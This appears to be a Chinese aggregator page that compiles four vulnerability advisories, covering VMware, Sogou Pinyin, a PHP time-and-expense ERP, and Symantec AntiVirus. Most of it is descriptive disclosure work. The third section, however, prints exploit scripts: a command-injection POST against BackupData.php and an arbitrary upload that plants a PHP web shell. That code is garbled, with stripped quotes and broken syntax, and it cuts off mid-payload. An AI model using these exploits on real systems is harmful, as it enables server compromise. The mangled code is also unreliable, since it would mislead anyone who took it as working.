“奔奔呀”通过精心收集,向本站投稿了4篇VMWare中VMSA0005更新修复多个安全漏洞,下面是小编为大家整理后的VMWare中VMSA0005更新修复多个安全漏洞,供大家参考借鉴,希望可以帮助您。

篇1:VMWare中VMSA0005更新修复多个安全漏洞
受影响系统:
VMWare Workstation 6.5.x
VMWare Workstation 6.0.x
VMWare Workstation 5.5.x
VMWare ACE 2.5.x
VMWare ACE 2.0.x
VMWare Player 2.5.x
VMWare Player 2.0.x
VMWare Server 2.x
VMWare Server 1.x
不受影响系统:
VMWare Workstation 6.5.2
VMWare ACE 2.5.2
VMWare Player 2.5.2
VMWare Server 2.0.1
VMWare Server 1.0.9
描述:
VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统,
VMWare的VMSA-2009-0005更新修复了多个安全漏洞,本地或远程攻击者可以利用这些漏洞绕过某些安全限制、获得权限提升或导致拒绝服务,
1) 如果远程攻击者在TCP 912端口上向vmware-authd守护程序发送了超长的USER字符串的话,就会终止vmware-authd进程,本地非特权用户无法访问虚拟机。
2) vmci.sys驱动的IOCTL处理器没有正确地验证Irp对象相关的缓冲区数据,拥有管理权限的本地用户可以在host或guest系统上获得SYSTEM权限。
3) VMnc codec(vmnc.dll)在处理3以上类型的RFB消息时的错误可能允许特制的视频文件触发内存破坏。
4) VMnc codec(vmnc.dll)没有正确地处理ICM_DECOMPRESS驱动消息,特制RIFF块中所定义的超长dwSize元素可以触发堆溢出。
5) ACE共享文件夹功能中的错误可能导致无需管理权限便在guest上启用共享文件夹。
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
lists.vmware.com/pipermail/security-announce/2009/000054.html

篇2:新版搜狗输入法已修复多个安全漏洞
[漏洞编号]
CAL_0625-1
CAL_20100625-2
CAL_20100625-3
[影响版本]
sogou_pinyin_50f 或以前
[公告]
翰海源代码审计实验室在搜狗拼音输入法里发现多个高威胁的安全漏洞,可导致攻击者执行任意代码,并将此漏洞上报给搜狐搜安全部门,8月初搜狗拼音通过客户端推送的方法已修复此安全漏洞,我们现在发布相应公告。请未使用搜狗拼音推送更新版本的及时安装搜狗拼音新的版本以避免安全威胁。
[漏洞细节]
一个高危漏洞存在于搜狗拼音处理提交的词库文件,目前新版本搜狗拼音已经禁止客户端直接关联词库文件进行安装了。
另两个漏洞存在于皮肤处理上,其中一个高危漏洞来自于搜狗拼音对ZIP压缩格式的处理,搜狗拼音的皮肤是一个ZIP文件,对ZIP的uncompress len字段处理存在问题导致堆溢出,具体细节如下
出错点在 ZipLib.dll 文件中
解压数据时会将解压数据大小加一后进行分配内存
当解压数据的尺寸为0xffffffff时,则会出现分配长度为0的内存,之后再写入到内存时则会覆盖原来内存中的信息
1000C466 8B86 B0000000 mov eax, dword ptr [esi+B0] ; 解压后字节数
1000C46C 40 inc eax ; 出错点
1000C46D 50 push eax
1000C46E E8 08DB0000 call 10019F7B ; _malloc
1000C473 59 pop ecx
1000C474 8986 B4000000 mov dword ptr [esi+B4], eax
1000C47A 8986 B8000000 mov dword ptr [esi+B8], eax
10010E69 8B45 F4 mov eax, dword ptr [ebp-C]
10010E6C 8B8E BC000000 mov ecx, dword ptr [esi+BC]
10010E72 8A57 04 mov dl, byte ptr [edi+4]
10010E75 881408 mov byte ptr [eax+ecx], dl ; 写入解压后数据
10010E78 40 inc eax
10010E79 8945 F4 mov dword ptr [ebp-C], eax
10010E7C 3B86 AC000000 cmp eax, dword ptr [esi+AC]
[验证POC]
www.vdisk.cn/down/index/4801593A1932
皮肤ZIP压缩处理堆溢出漏洞POC
[老版本验证下载地址]
www.vdisk.cn/down/index/4801585A2645
该版本用于验证此安全漏洞
[搜狗拼音新版本下载地址]
我们检测到8月2号以后的搜狗拼音输入法版本已解决以上安全问题,最新的搜狗拼音输入法下载地址如下
ime.sogou.com/dl/sogou_pinyin_50s.exe
[感谢]
感谢搜狐对漏洞报告的重视和及时修复
[时间线]
6月15号:翰海源发现1个词库高危安全漏洞
6月20号:翰海源向SOHU安全中心提交词库高危安全漏洞
6月21号:翰海源发现1个皮肤高危安全漏洞,1个皮肤中危安全漏洞
6月25号:翰海源向SOHU安全中心提交皮肤安全漏洞
8月2号后: 我们检测到8月2号以后的搜狗拼音输入法版本已解决以上安全问题
8月21号: 翰海源公告
About Code Audit Labs:
=====================
Code Audit Labs是南京翰海源信息技术有限公司的代码审计部门,公司是由国际资深安全研究人员在中国南京创办一家提供专业的安全测试产品/服务/咨询培训 的安全公司.旨在为各家软硬件生产厂商,行业用户提供专业的高覆盖可度量的安全测试,帮助他们改进自身产品和系统的安全.
我们希望为信息产业在开发过程之中就打造起信息安全的基石,提供安全质量,并凭借着为企业带来的价值而成为国际最专业的安全测试产品和服务的提供商
篇3:Time and Expense Management System多个安全漏洞及修复
Time and Expense Management System是一款使用PHP开发的ERP系统,Time and Expense Management System中存在命令注入、文件上传和反射型跨站脚本漏洞,可能导致架设Time and Expense Management System系统的网站被攻击者入侵,
[+]info:
~~~~~~~~~
# Software................Time and Expense Management System
# Download................sourceforge.net/projects/tems/
# Discovery Date..........4/27/
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................www.autosectools.com/
# Email...................John Leitch john@autosectools.com
[+]poc:
~~~~~~~~~
command injection
import sockethost = localhost
path = /tems
port = 80
def run_command:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
body = ------x
Content-Disposition: form-data; name=“toFile”
./a
------x
Content-Disposition: form-data; name=“DB_Admin_id”
a
------x
Content-Disposition: form-data; name=“DB_Admin_Password”
../../../../../../../calcx00a
------x--
s.send(POST %s/systemadmin/BackupData.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: %d
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
%s % (path, len(body), body))
print request sent, check for calc using the task manger
run_command()
Arbitrary Upload
import socket
host = localhost
path = /tems
shell_path = path + /images/logoshell.php
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send(POST + path + /systemadmin/Edit.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 938
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------x
Content-Disposition: form-data; name=“uid”
shell.php
------x
Content-Disposition: form-data; name=“name”
shell.php
------x
Content-Disposition: form-data; name=“address1”
shell.php
------x
Content-Disposition: form-data; name=“city”
shell.php
------x
Content-Disposition: form-data; name=“state”
shell.php
------x
Content-Disposition: form-data; name=“postalcode”
shell.php
------x
Content-Disposition: form-data; name=“country”
shell.php
------x
Content-Disposition: form-data; name=“weekendday”
shell.php
------x
&n
篇4:赛门铁克修复其杀毒软件中的另一个安全漏洞
美国东部时间9月6日(北京时间9月7日)消息:赛门铁克公司的企业杀毒软件中存在一个漏洞,攻击者利用这个漏洞可以获得进入服务器系统的用户名和密码,赛门铁克公司已经发布了修复这个漏洞的补丁程序,
这个漏洞是在上周的漏洞追踪安全电子邮箱列表中发现的,在杀毒软件AntiVirus9连接到赛门铁克公司实时更新系统并下载更新文件时会产生一个记录文件,攻击者和未授权用户可以利用这个漏洞从记录文件中清楚地查看到服务器的用户名和密码,
不管是本地用户还是远程用户,只要连接到网络就可以查看记录文件并获得进入实时更新服务器系统。但是,这个漏洞不会对家庭用户和小企业用户产生影响,特别是连接到赛门铁克公司实时更新服务器下载新的杀毒签名文件的用户。
周五的时候,赛门铁克公司发布了一份安全建议书并附上了AntiVirus9公司所用的实时更新客户端的更新文件。
赛门铁克公司还建议用户使用一个唯一的用户名和密码登陆实时更新系统,这样,即使这个帐户被他人窃取,攻击者也无法控制其他的服务器或系统。






